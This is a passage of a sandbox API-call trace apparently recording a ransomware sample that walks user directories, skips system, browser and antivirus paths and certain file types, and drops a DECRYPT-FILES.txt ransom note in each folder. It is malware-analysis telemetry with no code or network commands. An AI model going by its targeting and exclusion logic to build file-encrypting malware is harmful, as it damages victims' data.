(lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\Program Files") returned 0x0 [0087.997] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch=":\\Windows") returned 0x0 [0087.997] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\Games\\") returned 0x0 [0087.997] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\Tor Browser\\") returned 0x0 [0087.997] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\ProgramData\\") returned 0x0 [0087.997] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0087.997] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0087.997] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0087.997] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\All Users") returned 0x0 [0087.997] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\IETldCache\\") returned 0x0 [0087.997] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\Local Settings\\") returned 0x0 [0087.997] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\AppData\\Local") returned 0x0 [0087.997] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="AhnLab") returned 0x0 [0087.998] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0087.998] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\") returned 86 [0087.998] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.998] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\\\jkbimi8.tmp") returned 98 [0087.998] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0087.998] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\") returned 86 [0087.998] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0087.998] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\\\DECRYPT-FILES.txt") returned 104 [0087.998] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0088.000] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2dcc0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2dcc0*=0x23fc, lpOverlapped=0x0) returned 1 [0088.001] CloseHandle (hObject=0x44c) returned 1 [0088.001] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\") returned 86 [0088.001] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*" [0088.001] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*", lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0a676c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a676c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d18 [0088.001] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.001] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0a676c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a676c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.002] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.002] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.002] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0a676c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0a676c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a676c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0088.002] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0088.002] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf98cef90, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ImplicitAppShortcuts", cAlternateFileName="IMPLIC~1")) returned 1 [0088.002] lstrcmpW (lpString1="ImplicitAppShortcuts", lpString2=".") returned 1 [0088.002] lstrcmpW (lpString1="ImplicitAppShortcuts", lpString2="..") returned 1 [0088.002] lstrcatW (in: lpString1="ImplicitAppShortcuts", lpString2="\\" | out: lpString1="ImplicitAppShortcuts\\") returned="ImplicitAppShortcuts\\" [0088.002] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpString2="ImplicitAppShortcuts\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\" [0088.002] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\Program Files") returned 0x0 [0088.002] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch=":\\Windows") returned 0x0 [0088.002] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\Games\\") returned 0x0 [0088.002] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\Tor Browser\\") returned 0x0 [0088.002] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\ProgramData\\") returned 0x0 [0088.002] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0088.002] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0088.002] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0088.002] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\All Users") returned 0x0 [0088.002] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\IETldCache\\") returned 0x0 [0088.002] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\Local Settings\\") returned 0x0 [0088.002] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\AppData\\Local") returned 0x0 [0088.002] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="AhnLab") returned 0x0 [0088.002] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0088.002] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\") returned 107 [0088.002] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0088.002] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\\\jkbimi8.tmp") returned 119 [0088.002] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\implicitappshortcuts\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x450 [0088.003] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\") returned 107 [0088.003] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.003] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\\\DECRYPT-FILES.txt") returned 125 [0088.003] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\implicitappshortcuts\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0088.003] WriteFile (in: hFile=0x454, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2da44, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2da44*=0x23fc, lpOverlapped=0x0) returned 1 [0088.004] CloseHandle (hObject=0x454) returned 1 [0088.004] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\") returned 107 [0088.004] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*" [0088.004] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*", lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0a676c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a676c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d58 [0088.004] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.004] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0a676c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a676c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.004] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.004] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.004] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0a676c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0a676c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a676c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0088.005] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0088.005] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0a676c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0a676c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a676c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0088.005] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0088.005] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0088.005] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0088.005] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0088.005] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0088.005] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0088.005] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0088.005] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0088.005] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0088.005] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0088.005] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0088.005] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0088.005] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0088.005] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0088.005] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0088.005] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\") returned 107 [0088.005] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0088.005] lstrcpyW (in: lpString1=0x3f2da38, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\" [0088.005] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\jkbimi8.tmp" [0088.005] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.005] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\implicitappshortcuts\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.006] CloseHandle (hObject=0x0) returned 0 [0088.006] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.006] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0a676c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0a676c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a676c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0088.006] FindClose (in: hFindFile=0x5f8d58 | out: hFindFile=0x5f8d58) returned 1 [0088.006] CloseHandle (hObject=0x450) returned 1 [0088.006] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0a676c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0a676c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a676c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0088.006] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0088.006] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0088.006] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0088.006] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0088.006] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0088.006] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0088.006] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0088.006] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0088.006] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0088.006] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0088.006] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0088.006] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0088.006] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0088.006] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0088.006] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0088.006] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\") returned 86 [0088.006] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0088.007] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\" [0088.007] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\jkbimi8.tmp" [0088.007] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.007] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.007] CloseHandle (hObject=0x0) returned 0 [0088.007] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.007] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6477260, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x123526f, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TaskBar", cAlternateFileName="")) returned 1 [0088.007] lstrcmpW (lpString1="TaskBar", lpString2=".") returned 1 [0088.007] lstrcmpW (lpString1="TaskBar", lpString2="..") returned 1 [0088.007] lstrcatW (in: lpString1="TaskBar", lpString2="\\" | out: lpString1="TaskBar\\") returned="TaskBar\\" [0088.007] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpString2="TaskBar\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\" [0088.007] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\Program Files") returned 0x0 [0088.007] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch=":\\Windows") returned 0x0 [0088.007] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\Games\\") returned 0x0 [0088.007] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\Tor Browser\\") returned 0x0 [0088.007] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\ProgramData\\") returned 0x0 [0088.008] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0088.008] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0088.008] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0088.008] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\All Users") returned 0x0 